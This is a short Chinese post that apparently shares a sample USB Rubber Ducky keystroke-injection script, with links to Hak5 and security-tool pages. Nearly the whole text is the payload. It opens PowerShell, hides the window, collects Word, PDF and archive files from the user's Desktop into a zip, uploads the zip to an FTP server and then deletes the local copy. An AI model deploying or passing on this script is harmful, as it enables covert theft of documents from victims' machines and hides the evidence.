样例代码:

搜索所有doc 上传到ftp

DELAY 250
GUI r
DELAY 1000
STRING powershell 
ENTER
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
DELAY 250
ENTER
STRING $folderDateTime = ''
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Desktop' + $folderDateTime
ENTER
STRING $fileSaveDir = $userDir
ENTER
STRING echo $fileSaveDir
ENTER
STRING function copy-ToZip($fileSaveDir){ 
ENTER 
STRING $srcdir = $fileSaveDir 
ENTER
STRING $zipFile = 'c:\a\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) { 
ENTER
STRING set-content $zipFile (@PK@ + [char]5 + [char]6 + (@$([char]0)@ * 18))
ENTER 
STRING (dir $zipFile).IsReadOnly = $false} 
ENTER
STRING $shellApplication = new-object -com shell.application 
ENTER 
STRING $zipPackage = $shellApplication.NameSpace($zipFile) 
ENTER
STRING $files = Get-ChildItem -Path $srcdir  -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse 
ENTER 
STRING foreach($file in $files) { 
ENTER
STRING $zipPackage.CopyHere($file.FullName) 
ENTER 
STRING while($zipPackage.Items().Item($file.name) -eq $null){ 
ENTER
STRING Start-sleep -seconds 1 }}} 
ENTER 
STRING $final = 'c:\a\Report.zip'
ENTER
STRING copy-ToZip($fileSaveDir) 
ENTER
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $ftpAddr = 'ftp://192.168.11.110/Report.zip'
ENTER
STRING $browser = New-Object System.Net.WebClient  
ENTER
STRING $url = New-Object System.Uri($ftpAddr)  
ENTER
STRING $browser.UploadFile($url, $final)  
ENTER
STRING remove-item $final
ENTER
STRING exit
ENTER
ENTER
ENTER
ENTER
ENTER
ENTER
ENTER

参考文献:

http://www.ducktoolkit.com/Home.jsp

http://sec.chinabyte.com/410/13056910.shtml

http://www.freebuf.com/sectool/47411.html

https://hakshop.com/products/usb-rubber-ducky-deluxe

https://github.com/skysploit/simple-ducky

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads